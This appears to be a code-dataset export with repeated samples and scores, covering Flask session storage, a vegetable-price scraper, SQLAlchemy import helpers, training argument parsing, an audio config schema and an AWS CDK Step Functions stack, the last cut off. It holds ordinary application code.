class SessionTable:
"""
Provides helper functions for session management
Constants :
TIME_OUT_LIMIT -- (int) The limit used for the session
"""
TIME_OUT_LIMIT = 604800
@staticmethod
def clear_sessions():
"""
Removes old sessions that are expired
"""
new_time = to_unix_time(datetime.utcnow())
sess = GlobalDB.db().session
sess.query(SessionMap).filter(SessionMap.expiration < new_time).delete()
sess.commit()
@staticmethod
def does_session_exist(uid):
"""
arguments:
uid -- (String) the uid
return (boolean) if the session
"""
item = GlobalDB.db().session.query(SessionMap).filter_by(uid=uid).one_or_none()
if item is not None:
# session found
return True
else:
return False
@staticmethod
def get_timeout(uid):
"""
arguments:
uid -- (String) the uid
return (int) time when the session expires
"""
return GlobalDB.db().session.query(SessionMap).filter_by(uid=uid).one().expiration
@staticmethod
def get_data(uid):
"""
uid -- (String) the uid
return (Session) the session data
"""
return GlobalDB.db().session.query(SessionMap).filter_by(uid=uid).one().data
@staticmethod
def new_session(uid, data, expiration):
""" Updates current session or creates a new one if no session exists
arguments:
uid -- (String) the session id
data -- (String) the data for the session
expiration -- (int) the time in seconds from 1970 when the session is no longer active
Updates the existing session or creates a new one
"""
# Try converting session to json
sess = GlobalDB.db().session
user_session = sess.query(SessionMap).filter_by(uid=uid).one_or_none()
if user_session is None:
# No existing session found, create a new one
new_session = SessionMap(uid=uid, data=dumps(data), expiration=to_unix_time(expiration))
sess.add(new_session)
else:
# Modify existing session
user_session.data = dumps(data)
user_session.expiration = to_unix_time(expiration)
sess.commit() | dataactbroker/handlers/aws/session.py | from json import loads, dumps
from uuid import uuid4
from datetime import datetime, timedelta
from flask.sessions import SessionInterface, SessionMixin
from flask_login import _create_identifier
from dataactcore.interfaces.db import GlobalDB
from dataactcore.models.userModel import SessionMap
class LoginSession:
"""
This class is a wrapper for the session object
"""
@staticmethod
def logout(session):
"""
arguments:
session -- (Session) the session object
Clears the current session
"""
session.pop("login", None)
session.pop("name", None)
@staticmethod
def login(session, username):
"""
arguments:
session -- (Session) the session object
username -- (int) the id of the user
Sets the current session status
"""
session["name"] = username
session["login"] = True
@staticmethod
def reset_id(session):
"""
arguments:
session -- (Session) the session object
resets the _uid in cases that the session becomes invalid
"""
session["_uid"] = "{}|{}".format(_create_identifier(), uuid4())
def to_unix_time(datetime_value):
"""
arguments:
datetime_value -- (DateTime)
Converts datetime_value to time in seconds since 1970
returns int
"""
if isinstance(datetime_value, datetime):
# If argument is a datetime object, convert to timestamp
return (datetime_value - datetime(1970, 1, 1)).total_seconds()
return datetime_value
class UserSession(dict, SessionMixin):
"""
Class that wraps around normal Flask Session object
"""
pass
class UserSessionInterface(SessionInterface):
"""
Class That implements the SessionInterface and uses SessionTable to store data
"""
SESSION_CLEAR_COUNT_LIMIT = 10
CountLimit = 1
def __init__(self):
return
def open_session(self, app, request):
"""
arguments:
app -- (Flask) the Flask application
request -- (Request) the request object
implements the open_session method that pulls or creates a new UserSession object
"""
sid = request.headers.get("x-session-id")
if sid and SessionTable.does_session_exist(sid):
if SessionTable.get_timeout(sid) > to_unix_time(datetime.utcnow()):
session_dict = UserSession()
# Read data as json
data = loads(SessionTable.get_data(sid))
for key in data.keys():
session_dict[key] = data[key]
return session_dict
# This can be made better most likely need to do research
# Maybe Hash(time + server id + random number)? Want to prevent any conflicts
sid = str(uuid4())
session_dict = UserSession()
session_dict["sid"] = sid
return session_dict
def save_session(self, app, session, response):
"""
arguments:
app -- (Flask) the Flask application
request -- (Request) the request object
session -- (Session) the session object
implements the save_session method that saves the session or clears it
based on the timeout limit, this function also extends the expiration time of the current session
"""
if not session:
return
# Extend the expiration based on either the time out limit set here or
# the permanent_session_lifetime property of the app
if self.get_expiration_time(app, session):
expiration = self.get_expiration_time(app, session)
else:
if "session_check" in session and session["session_check"] and \
SessionTable.does_session_exist(session["sid"]):
# This is just a session check, don't extend expiration time
expiration = SessionTable.get_timeout(session["sid"])
# Make sure next route call does not get counted as session check
session["session_check"] = False
else:
expiration = datetime.utcnow() + timedelta(seconds=SessionTable.TIME_OUT_LIMIT)
if "_uid" not in session:
LoginSession.reset_id(session)
SessionTable.new_session(session["sid"], session, expiration)
UserSessionInterface.CountLimit += 1
if UserSessionInterface.CountLimit % UserSessionInterface.SESSION_CLEAR_COUNT_LIMIT == 0:
SessionTable.clear_sessions()
UserSessionInterface.CountLimit = 1
# Return session ID as header x-session-id
response.headers["x-session-id"] = session["sid"]
class SessionTable:
"""
Provides helper functions for session management
Constants :
TIME_OUT_LIMIT -- (int) The limit used for the session
"""
TIME_OUT_LIMIT = 604800
@staticmethod
def clear_sessions():
"""
Removes old sessions that are expired
"""
new_time = to_unix_time(datetime.utcnow())
sess = GlobalDB.db().session
sess.query(SessionMap).filter(SessionMap.expiration < new_time).delete()
sess.commit()
@staticmethod
def does_session_exist(uid):
"""
arguments:
uid -- (String) the uid
return (boolean) if the session
"""
item = GlobalDB.db().session.query(SessionMap).filter_by(uid=uid).one_or_none()
if item is not None:
# session found
return True
else:
return False
@staticmethod
def get_timeout(uid):
"""
arguments:
uid -- (String) the uid
return (int) time when the session expires
"""
return GlobalDB.db().session.query(SessionMap).filter_by(uid=uid).one().expiration
@staticmethod
def get_data(uid):
"""
uid -- (String) the uid
return (Session) the session data
"""
return GlobalDB.db().session.query(SessionMap).filter_by(uid=uid).one().data
@staticmethod
def new_session(uid, data, expiration):
""" Updates current session or creates a new one if no session exists
arguments:
uid -- (String) the session id
data -- (String) the data for the session
expiration -- (int) the time in seconds from 1970 when the session is no longer active
Updates the existing session or creates a new one
"""
# Try converting session to json
sess = GlobalDB.db().session
user_session = sess.query(SessionMap).filter_by(uid=uid).one_or_none()
if user_session is None:
# No existing session found, create a new one
new_session = SessionMap(uid=uid, data=dumps(data), expiration=to_unix_time(expiration))
sess.add(new_session)
else:
# Modify existing session
user_session.data = dumps(data)
user_session.expiration = to_unix_time(expiration)
sess.commit() | 0.629433 | 0.231669 |
import requests, re
import csv
from datetime import timedelta, date
import datetime
import os.path
from collections import deque
from average import average
from typhoon import typhoon
from merge import merge
from transToJson import transToJson
import VG
dir = os.path.dirname(os.path.abspath(__file__))
oneday = timedelta(days=1)
default_start_date = VG.default_start_date
end_date = date.today()
#date control--------------------------------------------------------------------
def string_month_day_transer(input_month_day):
if(input_month_day < 10):
return '0'+str(input_month_day)
else:
return str(input_month_day)
def string_transto_ROCyear(input_year):
return str(input_year-1911)
#--------------------------------------------------------------------------------
def get_oneday(vegetable_code:str, upload_date:datetime.date):
oneday_dict = dict()
payload = {
'mhidden1':'false',
'myy':string_transto_ROCyear(upload_date.year),
'mmm':string_month_day_transer(upload_date.month),
'mdd':string_month_day_transer(upload_date.day),
'mpno':vegetable_code
}
res = requests.post("http://amis.afa.gov.tw/v-asp/v101r.asp", data = payload)
res.encoding = 'big5'
vg_weight_re = re.search('<font color="#0000FF">([0-9]*\.?[0-9]*)</font>公斤</strong></td>', res.text)
vg_price_re = re.search('<font color="#0000FF">([0-9]*\.[0-9]*)</font>元/公斤</strong></td>', res.text)
if(vg_weight_re and vg_price_re):
vg_weight = float(vg_weight_re.group(1))
vg_price = float(vg_price_re.group(1))
oneday_dict = {
'year':upload_date.year,
'month':upload_date.month,
'day':upload_date.day,
'weight':vg_weight,
'price':vg_price
}
else:
#miss data, use yesterday
oneday_dict = get_oneday(vegetable_code, upload_date - oneday)
#make date right
oneday_dict['year'] = upload_date.year
oneday_dict['month'] = upload_date.month
oneday_dict['day'] = upload_date.day
return oneday_dict
#--------------------------------------------------------------------------------
def vg_csv_file(vagetable:str):
return dir + '/vagetable/' +vagetable+'.csv'
#--------------------------------------------------------------------------------
def least_day(csvfile):
least_row = deque(csv.reader(csvfile), 1)[0]
date = datetime.date(int(least_row[0]), int(least_row[1]), int(least_row[2]))
print('\tleast date->',date)
return date
#--------------------------------------------------------------------------------
if __name__ == '__main__':
for vagetable in VG.VG_LIST:
print(vagetable)
#exist item
if(os.path.isfile(vg_csv_file(vagetable)) ):
print('\tfind '+vg_csv_file(vagetable))
#find which day to start
csvfile_read = open(vg_csv_file(vagetable), 'r', newline='')
date = least_day(csvfile_read) + oneday
#append data
csvfile_write = open(vg_csv_file(vagetable), 'a', newline='')
fieldnames = ['year', 'month', 'day', 'weight', 'price']
writer = csv.DictWriter(csvfile_write, fieldnames=fieldnames)
while(date != end_date):
data = get_oneday(vagetable, date)
print('\t',data)
#one day
writer.writerow({'year':data['year'],
'month':data['month'],
'day':data['day'],
'weight':data['weight'],
'price':data['price']})
date += oneday
csvfile_read.close()
csvfile_write.close()
#new item
else:
print('\t'+vg_csv_file(vagetable)+' do not exist')
print('\tcreat '+vg_csv_file(vagetable))
csvfile = open(vg_csv_file(vagetable), 'w', newline='')
fieldnames = ['year', 'month', 'day', 'weight', 'price']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
#parse from default_start_date
date = default_start_date
while(date != end_date):
data = get_oneday(vagetable, date)
print('\t',data)
#one day
writer.writerow({'year':data['year'],
'month':data['month'],
'day':data['day'],
'weight':data['weight'],
'price':data['price']})
date += oneday
csvfile.close()
average()
typhoon()
merge()
transToJson() | vegetable-price/python/parser/parser.py | import requests, re
import csv
from datetime import timedelta, date
import datetime
import os.path
from collections import deque
from average import average
from typhoon import typhoon
from merge import merge
from transToJson import transToJson
import VG
dir = os.path.dirname(os.path.abspath(__file__))
oneday = timedelta(days=1)
default_start_date = VG.default_start_date
end_date = date.today()
#date control--------------------------------------------------------------------
def string_month_day_transer(input_month_day):
if(input_month_day < 10):
return '0'+str(input_month_day)
else:
return str(input_month_day)
def string_transto_ROCyear(input_year):
return str(input_year-1911)
#--------------------------------------------------------------------------------
def get_oneday(vegetable_code:str, upload_date:datetime.date):
oneday_dict = dict()
payload = {
'mhidden1':'false',
'myy':string_transto_ROCyear(upload_date.year),
'mmm':string_month_day_transer(upload_date.month),
'mdd':string_month_day_transer(upload_date.day),
'mpno':vegetable_code
}
res = requests.post("http://amis.afa.gov.tw/v-asp/v101r.asp", data = payload)
res.encoding = 'big5'
vg_weight_re = re.search('<font color="#0000FF">([0-9]*\.?[0-9]*)</font>公斤</strong></td>', res.text)
vg_price_re = re.search('<font color="#0000FF">([0-9]*\.[0-9]*)</font>元/公斤</strong></td>', res.text)
if(vg_weight_re and vg_price_re):
vg_weight = float(vg_weight_re.group(1))
vg_price = float(vg_price_re.group(1))
oneday_dict = {
'year':upload_date.year,
'month':upload_date.month,
'day':upload_date.day,
'weight':vg_weight,
'price':vg_price
}
else:
#miss data, use yesterday
oneday_dict = get_oneday(vegetable_code, upload_date - oneday)
#make date right
oneday_dict['year'] = upload_date.year
oneday_dict['month'] = upload_date.month
oneday_dict['day'] = upload_date.day
return oneday_dict
#--------------------------------------------------------------------------------
def vg_csv_file(vagetable:str):
return dir + '/vagetable/' +vagetable+'.csv'
#--------------------------------------------------------------------------------
def least_day(csvfile):
least_row = deque(csv.reader(csvfile), 1)[0]
date = datetime.date(int(least_row[0]), int(least_row[1]), int(least_row[2]))
print('\tleast date->',date)
return date
#--------------------------------------------------------------------------------
if __name__ == '__main__':
for vagetable in VG.VG_LIST:
print(vagetable)
#exist item
if(os.path.isfile(vg_csv_file(vagetable)) ):
print('\tfind '+vg_csv_file(vagetable))
#find which day to start
csvfile_read = open(vg_csv_file(vagetable), 'r', newline='')
date = least_day(csvfile_read) + oneday
#append data
csvfile_write = open(vg_csv_file(vagetable), 'a', newline='')
fieldnames = ['year', 'month', 'day', 'weight', 'price']
writer = csv.DictWriter(csvfile_write, fieldnames=fieldnames)
while(date != end_date):
data = get_oneday(vagetable, date)
print('\t',data)
#one day
writer.writerow({'year':data['year'],
'month':data['month'],
'day':data['day'],
'weight':data['weight'],
'price':data['price']})
date += oneday
csvfile_read.close()
csvfile_write.close()
#new item
else:
print('\t'+vg_csv_file(vagetable)+' do not exist')
print('\tcreat '+vg_csv_file(vagetable))
csvfile = open(vg_csv_file(vagetable), 'w', newline='')
fieldnames = ['year', 'month', 'day', 'weight', 'price']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
#parse from default_start_date
date = default_start_date
while(date != end_date):
data = get_oneday(vagetable, date)
print('\t',data)
#one day
writer.writerow({'year':data['year'],
'month':data['month'],
'day':data['day'],
'weight':data['weight'],
'price':data['price']})
date += oneday
csvfile.close()
average()
typhoon()
merge()
transToJson() | 0.12412 | 0.065068 |
from .sbaas_base import sbaas_base
from .sbaas_base_query_insert import sbaas_base_query_insert
from .sbaas_base_query_update import sbaas_base_query_update
from .sbaas_base_query_delete import sbaas_base_query_delete
# resources
from io_utilities.base_importData import base_importData
class sbaas_base_i(sbaas_base
):
def import_rows_sqlalchemyModel_add_csv(self,model_I,filename_I):
'''Add rows to model_I from filename_I
INPUT:
model_I = sqlalchemy model object
filename_I = .csv file name/location
'''
data = base_importData();
data.read_csv(filename_I);
data.format_data();
queryinsert = sbaas_base_query_insert(session_I=self.session,engine_I=self.engine,settings_I=self.settings,data_I=self.data);
queryinsert.add_rows_sqlalchemyModel(model_I,data.data);
data.clear_data();
def import_rows_sqlalchemyModel_update_csv(self,model_I,filename_I):
'''update rows of model_I from filename_I
INPUT:
model_I = sqlalchemy model object
filename_I = .csv file name/location
'''
data = base_importData();
data.read_csv(filename_I);
data.format_data();
queryupdate = sbaas_base_query_update(session_I=self.session,engine_I=self.engine,settings_I=self.settings,data_I=self.data);
queryupdate.update_rows_sqlalchemyModel_primaryKeys(model_I,data.data);
data.clear_data();
def import_rows_sqlalchemyModel_reset_csv(self,model_I,filename_I):
'''reset rows of model_I from filename_I
INPUT:
model_I = sqlalchemy model object
filename_I = .csv file name/location
'''
data = base_importData();
data.read_csv(filename_I);
data.format_data();
querydelete = sbaas_base_query_delete(session_I=self.session,engine_I=self.engine,settings_I=self.settings,data_I=self.data);
querydelete.reset_rows_sqlalchemyModel_primaryKeys(model_I,data.data);
data.clear_data();
def import_rows_sqlalchemyModel_add_listDict(self,model_I,listDict_I):
'''Add rows to model_I from listDict_I
INPUT:
model_I = sqlalchemy model object
listDict_I = [{}]
'''
queryinsert = sbaas_base_query_insert(session_I=self.session,engine_I=self.engine,settings_I=self.settings,data_I=self.data);
queryinsert.add_rows_sqlalchemyModel(model_I,listDict_I);
def import_rows_sqlalchemyModel_update_listDict(self,model_I,filename_I):
'''update rows of model_I from listDict_I
INPUT:
model_I = sqlalchemy model object
listDict_I = [{}]
'''
queryupdate = sbaas_base_query_update(session_I=self.session,engine_I=self.engine,settings_I=self.settings,data_I=self.data);
queryupdate.update_rows_sqlalchemyModel_primaryKeys(model_I,listDict_I); | SBaaS_base/sbaas_base_i.py | from .sbaas_base import sbaas_base
from .sbaas_base_query_insert import sbaas_base_query_insert
from .sbaas_base_query_update import sbaas_base_query_update
from .sbaas_base_query_delete import sbaas_base_query_delete
# resources
from io_utilities.base_importData import base_importData
class sbaas_base_i(sbaas_base
):
def import_rows_sqlalchemyModel_add_csv(self,model_I,filename_I):
'''Add rows to model_I from filename_I
INPUT:
model_I = sqlalchemy model object
filename_I = .csv file name/location
'''
data = base_importData();
data.read_csv(filename_I);
data.format_data();
queryinsert = sbaas_base_query_insert(session_I=self.session,engine_I=self.engine,settings_I=self.settings,data_I=self.data);
queryinsert.add_rows_sqlalchemyModel(model_I,data.data);
data.clear_data();
def import_rows_sqlalchemyModel_update_csv(self,model_I,filename_I):
'''update rows of model_I from filename_I
INPUT:
model_I = sqlalchemy model object
filename_I = .csv file name/location
'''
data = base_importData();
data.read_csv(filename_I);
data.format_data();
queryupdate = sbaas_base_query_update(session_I=self.session,engine_I=self.engine,settings_I=self.settings,data_I=self.data);
queryupdate.update_rows_sqlalchemyModel_primaryKeys(model_I,data.data);
data.clear_data();
def import_rows_sqlalchemyModel_reset_csv(self,model_I,filename_I):
'''reset rows of model_I from filename_I
INPUT:
model_I = sqlalchemy model object
filename_I = .csv file name/location
'''
data = base_importData();
data.read_csv(filename_I);
data.format_data();
querydelete = sbaas_base_query_delete(session_I=self.session,engine_I=self.engine,settings_I=self.settings,data_I=self.data);
querydelete.reset_rows_sqlalchemyModel_primaryKeys(model_I,data.data);
data.clear_data();
def import_rows_sqlalchemyModel_add_listDict(self,model_I,listDict_I):
'''Add rows to model_I from listDict_I
INPUT:
model_I = sqlalchemy model object
listDict_I = [{}]
'''
queryinsert = sbaas_base_query_insert(session_I=self.session,engine_I=self.engine,settings_I=self.settings,data_I=self.data);
queryinsert.add_rows_sqlalchemyModel(model_I,listDict_I);
def import_rows_sqlalchemyModel_update_listDict(self,model_I,filename_I):
'''update rows of model_I from listDict_I
INPUT:
model_I = sqlalchemy model object
listDict_I = [{}]
'''
queryupdate = sbaas_base_query_update(session_I=self.session,engine_I=self.engine,settings_I=self.settings,data_I=self.data);
queryupdate.update_rows_sqlalchemyModel_primaryKeys(model_I,listDict_I); | 0.290981 | 0.041598 |
import argparse
parser = argparse.ArgumentParser(description="CoViAR")
# Data.
parser.add_argument('--data-name', type=str,
help='dataset name.') #choices=['ucf101', 'hmdb51']
parser.add_argument('--data-root', type=str,
help='root of data directory.')
parser.add_argument('--train-list', type=str,
help='training example list.')
parser.add_argument('--test-list', type=str,
help='testing example list.')
# Model.
parser.add_argument('--arch', type=str, default="resnet152",
help='base architecture.')
parser.add_argument('--num_segments', type=int, default=3,
help='number of TSN segments.')
parser.add_argument('--no-accumulation', action='store_true',
help='disable accumulation of motion vectors and residuals.')
parser.add_argument('--dropout', '--dropout', default=0.5, type=float,
help='dropout.')
parser.add_argument('--is_shift', action='store_true',
help='enable TSM')
# Training.
parser.add_argument('--is_train', action='store_true',
help='training flag.')
parser.add_argument('--epochs', default=500, type=int,
help='number of training epochs.')
parser.add_argument('--batch-size', default=40, type=int,
help='batch size.')
parser.add_argument('--lr', default=0.001, type=float,
help='base learning rate.')
parser.add_argument('--lr-steps', default=[200, 300, 400], type=float, nargs="+",
help='epochs to decay learning rate.')
parser.add_argument('--lr-decay', default=0.1, type=float,
help='lr decay factor.')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
help='weight decay.')
parser.add_argument('--clip_gradient', '--gd', type=int, default=20, help='gradient clip')
parser.add_argument("--local_rank", type=int,
help='local rank for DistributedDataParallel')
# Log.
parser.add_argument('--eval-freq', default=5, type=int,
help='evaluation frequency (epochs).')
parser.add_argument('--workers', default=20, type=int,
help='number of data loader workers.')
parser.add_argument('--model-prefix', type=str, default="model",
help="prefix of model name.")
parser.add_argument('--gpus', type=str, default='2',
help='gpu ids.') | train_options.py |
import argparse
parser = argparse.ArgumentParser(description="CoViAR")
# Data.
parser.add_argument('--data-name', type=str,
help='dataset name.') #choices=['ucf101', 'hmdb51']
parser.add_argument('--data-root', type=str,
help='root of data directory.')
parser.add_argument('--train-list', type=str,
help='training example list.')
parser.add_argument('--test-list', type=str,
help='testing example list.')
# Model.
parser.add_argument('--arch', type=str, default="resnet152",
help='base architecture.')
parser.add_argument('--num_segments', type=int, default=3,
help='number of TSN segments.')
parser.add_argument('--no-accumulation', action='store_true',
help='disable accumulation of motion vectors and residuals.')
parser.add_argument('--dropout', '--dropout', default=0.5, type=float,
help='dropout.')
parser.add_argument('--is_shift', action='store_true',
help='enable TSM')
# Training.
parser.add_argument('--is_train', action='store_true',
help='training flag.')
parser.add_argument('--epochs', default=500, type=int,
help='number of training epochs.')
parser.add_argument('--batch-size', default=40, type=int,
help='batch size.')
parser.add_argument('--lr', default=0.001, type=float,
help='base learning rate.')
parser.add_argument('--lr-steps', default=[200, 300, 400], type=float, nargs="+",
help='epochs to decay learning rate.')
parser.add_argument('--lr-decay', default=0.1, type=float,
help='lr decay factor.')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
help='weight decay.')
parser.add_argument('--clip_gradient', '--gd', type=int, default=20, help='gradient clip')
parser.add_argument("--local_rank", type=int,
help='local rank for DistributedDataParallel')
# Log.
parser.add_argument('--eval-freq', default=5, type=int,
help='evaluation frequency (epochs).')
parser.add_argument('--workers', default=20, type=int,
help='number of data loader workers.')
parser.add_argument('--model-prefix', type=str, default="model",
help="prefix of model name.")
parser.add_argument('--gpus', type=str, default='2',
help='gpu ids.') | 0.593609 | 0.072735 |
from schema import Schema, And, Or, Use
import yaml
from pathlib import Path
from io import StringIO
DEFAULT_CONFIG = """\
runtime:
cores_per_node: 1 # Number of cores per node (positive integer)
batch_size: 1 # Size of batches (positive integer)
raven:
annotations: false # Look for Raven annotations (boolean)
label_corrections: null # Use this file to correct classes in Raven annotations (null or string)
audio:
sample_rate: 22050 # Sample rate for audio resampling (null or positive integer)
max_duration: null # Maximum duration of audio file during read (null or positive integer)
resample_type: "kaiser_best" # Resample type for librosa ("kaiser_best" or "kaiser_fast")
split_and_save:
clip_duration: 5 # The duration of the output segments
clip_overlap: 1 # The overlap of adjacent segments
final_clip: null # How to treat the final clip (null, "remainder", "full", "extend")
dry_run: false # Write the segments CSV but don't write the audio segments (boolean)
""".strip()
greater_than_zero = lambda n: n > 0
greater_than_or_equal_zero = lambda n: n >= 0
AUDIO_SCHEMA = Schema(
{
"sample_rate": Or(
None,
And(
Use(int),
greater_than_zero,
error="Sample rate should be null or a positive integer",
),
),
"max_duration": Or(
None,
And(
Use(int),
greater_than_zero,
error="Max duration should be a positive integer or null",
),
),
"resample_type": And(
Use(str),
lambda s: s in ["kaiser_best", "kaiser_fast"],
error="Resample type can be one of kaiser_fast or kaiser_best",
),
}
)
RUNTIME_SCHEMA = Schema(
{
"cores_per_node": And(Use(int), greater_than_zero),
"batch_size": And(Use(int), greater_than_zero),
}
)
RAVEN_SCHEMA = Schema(
{
"annotations": Use(
bool, error="Annotations should be a boolean value, e.g. `true` or `false`"
),
"label_corrections": Or(
None,
And(
Use(str),
lambda fname: Path(fname).exists() and Path(fname).isfile(),
error="Label corrections should be a file that exists",
),
),
}
)
SPLIT_AND_SAVE_SCHEMA = Schema(
{
"clip_duration": And(Use(int), greater_than_zero),
"clip_overlap": And(Use(int), greater_than_or_equal_zero),
"final_clip": Or(
None,
And(
Use(str),
lambda s: s in ["remainder", "full", "extend"],
error="Final clip can be one of `remainder`, `full`, `extend`",
),
),
"dry_run": Use(
bool, error="dry_run should be a boolean value, e.g. `true` or `false`"
),
}
)
SCHEMA = Schema(
{
"audio": AUDIO_SCHEMA,
"runtime": RUNTIME_SCHEMA,
"raven": RAVEN_SCHEMA,
"split_and_save": SPLIT_AND_SAVE_SCHEMA,
}
)
def validate(config):
""" Validate a configuration string
Input:
config: A string containing an Opensoundscape configuration
Output:
dict: A dictionary of the validated Opensoundscape configuration
"""
with StringIO(config) as f:
yml = yaml.load(f, Loader=yaml.SafeLoader)
return SCHEMA.validate(yml)
def validate_file(fname):
""" Validate a configuration file
Input:
fname: A filename containing an Opensoundscape configuration
Output:
dict: A dictionary of the validated Opensoundscape configuration
"""
with open(fname, "r") as f:
yml = yaml.load(f, Loader=yaml.SafeLoader)
return SCHEMA.validate(yml)
def get_default_config():
""" Get the default configuration file as a dictionary
Output:
dict: A dictionary containing the default Opensoundscape configuration
"""
return validate(DEFAULT_CONFIG) | opensoundscape/config.py | from schema import Schema, And, Or, Use
import yaml
from pathlib import Path
from io import StringIO
DEFAULT_CONFIG = """\
runtime:
cores_per_node: 1 # Number of cores per node (positive integer)
batch_size: 1 # Size of batches (positive integer)
raven:
annotations: false # Look for Raven annotations (boolean)
label_corrections: null # Use this file to correct classes in Raven annotations (null or string)
audio:
sample_rate: 22050 # Sample rate for audio resampling (null or positive integer)
max_duration: null # Maximum duration of audio file during read (null or positive integer)
resample_type: "kaiser_best" # Resample type for librosa ("kaiser_best" or "kaiser_fast")
split_and_save:
clip_duration: 5 # The duration of the output segments
clip_overlap: 1 # The overlap of adjacent segments
final_clip: null # How to treat the final clip (null, "remainder", "full", "extend")
dry_run: false # Write the segments CSV but don't write the audio segments (boolean)
""".strip()
greater_than_zero = lambda n: n > 0
greater_than_or_equal_zero = lambda n: n >= 0
AUDIO_SCHEMA = Schema(
{
"sample_rate": Or(
None,
And(
Use(int),
greater_than_zero,
error="Sample rate should be null or a positive integer",
),
),
"max_duration": Or(
None,
And(
Use(int),
greater_than_zero,
error="Max duration should be a positive integer or null",
),
),
"resample_type": And(
Use(str),
lambda s: s in ["kaiser_best", "kaiser_fast"],
error="Resample type can be one of kaiser_fast or kaiser_best",
),
}
)
RUNTIME_SCHEMA = Schema(
{
"cores_per_node": And(Use(int), greater_than_zero),
"batch_size": And(Use(int), greater_than_zero),
}
)
RAVEN_SCHEMA = Schema(
{
"annotations": Use(
bool, error="Annotations should be a boolean value, e.g. `true` or `false`"
),
"label_corrections": Or(
None,
And(
Use(str),
lambda fname: Path(fname).exists() and Path(fname).isfile(),
error="Label corrections should be a file that exists",
),
),
}
)
SPLIT_AND_SAVE_SCHEMA = Schema(
{
"clip_duration": And(Use(int), greater_than_zero),
"clip_overlap": And(Use(int), greater_than_or_equal_zero),
"final_clip": Or(
None,
And(
Use(str),
lambda s: s in ["remainder", "full", "extend"],
error="Final clip can be one of `remainder`, `full`, `extend`",
),
),
"dry_run": Use(
bool, error="dry_run should be a boolean value, e.g. `true` or `false`"
),
}
)
SCHEMA = Schema(
{
"audio": AUDIO_SCHEMA,
"runtime": RUNTIME_SCHEMA,
"raven": RAVEN_SCHEMA,
"split_and_save": SPLIT_AND_SAVE_SCHEMA,
}
)
def validate(config):
""" Validate a configuration string
Input:
config: A string containing an Opensoundscape configuration
Output:
dict: A dictionary of the validated Opensoundscape configuration
"""
with StringIO(config) as f:
yml = yaml.load(f, Loader=yaml.SafeLoader)
return SCHEMA.validate(yml)
def validate_file(fname):
""" Validate a configuration file
Input:
fname: A filename containing an Opensoundscape configuration
Output:
dict: A dictionary of the validated Opensoundscape configuration
"""
with open(fname, "r") as f:
yml = yaml.load(f, Loader=yaml.SafeLoader)
return SCHEMA.validate(yml)
def get_default_config():
""" Get the default configuration file as a dictionary
Output:
dict: A dictionary containing the default Opensoundscape configuration
"""
return validate(DEFAULT_CONFIG) | 0.817064 | 0.335609 |
from aws_cdk import (
aws_stepfunctions as sfn,
aws_stepfunctions_tasks as sfn_tasks,
core,
)
class JobPollerStack(core.Stack):
def __init__(self, app: core.App, id: str, **kwargs) -> None:
super().__init__(app, id, **kwargs)
submit_job_activity = sfn.Activity(
self, "SubmitJob"
)
check_job_activity = sfn.Activity(
self, "CheckJob"
)
do_mapping_activity1 = sfn.Activity(
self, "MapJOb1"
)
do_mapping_activity2 = sfn.Activity(
self, "MapJOb2"
)
submit_job = sfn.Task(
self, "Submit Job",
task=sfn_tasks.InvokeActivity(submit_job_activity),
result_path="$.guid",
)
task1 = sfn.Task(
self, "Task 1 in Mapping",
task=sfn_tasks.InvokeActivity(do_mapping_activity1),
result_path="$.guid",
)
task2 = sfn.Task(
self, "Task 2 in Mapping",
task=sfn_tasks.InvokeActivity(do_mapping_activity2),
result_path="$.guid",
)
wait_x = sfn.Wait(
self, "Wait X Seconds",
time=sfn.WaitTime.seconds_path('$.wait_time'),
)
get_status = sfn.Task(
self, "Get Job Status",
task=sfn_tasks.InvokeActivity(check_job_activity),
input_path="$.guid",
result_path="$.status",
)
is_complete = sfn.Choice(
self, "Job Complete?"
)
job_failed = sfn.Fail(
self, "Job Failed",
cause="AWS Batch Job Failed",
error="DescribeJob returned FAILED"
)
final_status = sfn.Task(
self, "Get Final Job Status",
task=sfn_tasks.InvokeActivity(check_job_activity),
input_path="$.guid",
)
definition_map = task1.next(task2)
process_map = sfn.Map(
self, "Process_map",
max_concurrency=10
).iterator(definition_map)
definition = submit_job \
.next(process_map) \
.next(wait_x) \
.next(get_status) \
.next(is_complete
.when(sfn.Condition.string_equals(
"$.status", "FAILED"), job_failed)
.when(sfn.Condition.string_equals(
"$.status", "SUCCEEDED"), final_status)
.otherwise(wait_x))
sfn.StateMachine(
self, "StateMachine",
definition=definition,
timeout=core.Duration.seconds(30),
) | python/stepfunctions/stepfunctions/stepfunctions_stack.py | from aws_cdk import (
aws_stepfunctions as sfn,
aws_stepfunctions_tasks as sfn_tasks,
core,
)
class JobPollerStack(core.Stack):
def __init__(self, app: core.App, id: str, **kwargs) -> None:
super().__init__(app, id, **kwargs)
submit_job_activity = sfn.Activity(
self, "SubmitJob"
)
check_job_activity = sfn.Activity(
self, "CheckJob"
)
do_mapping_activity1 = sfn.Activity(
self, "MapJOb1"
)
do_mapping_activity2 = sfn.Activity(
self, "MapJOb2"
)
submit_job = sfn.Task(
self, "Submit Job",
task=sfn_tasks.InvokeActivity(submit_job_activity),
result_path="$.guid",
)
task1 = sfn.Task(
self, "Task 1 in Mapping",
task=sfn_tasks.InvokeActivity(do_mapping_activity1),
result_path="$.guid",
)
task2 = sfn.Task(
self, "Task 2 in Mapping",
task=sfn_tasks.InvokeActivity(do_mapping_activity2),
result_path="$.guid",
)
wait_x = sfn.Wait(
self, "Wait X Seconds",
time=sfn.WaitTime.seconds_path('$.wait_time'),
)
get_status = sfn.Task(
self, "Get Job Status",
task=sfn_tasks.InvokeActivity(check_job_activity),
input_path="$.guid",
result_path="$.status",
)
is_complete = sfn.Choice(
self, "Job Complete?"
)
job_failed = sfn.Fail(
self, "Job Failed",
cause="AWS Batch Job Failed",
error="DescribeJob returned FAILED"
)
final_status = sfn.Task(
self, "Get Final Job Status",
task=sfn_tasks.InvokeActivity(check_job_activity),
input_path="$.guid",
)
definition_map = task1.next(task2)
process_map = sfn.Map(
self, "Process_map",
max_concurrency=10
).iterator(definition_map)
definition = submit_job \
.next(process_map) \
.next(wait_x) \
.next(get_status) \
.next(is_complete
.when(sfn.Condition.string_equals(
"$.status", "FAILED"), job_failed)
.when(sfn.Condition.string_equals(
"$.status", "SUCCEEDED"), final_status)
.otherwise(wait_x))
sfn.StateMachine(
self, "StateMachine",
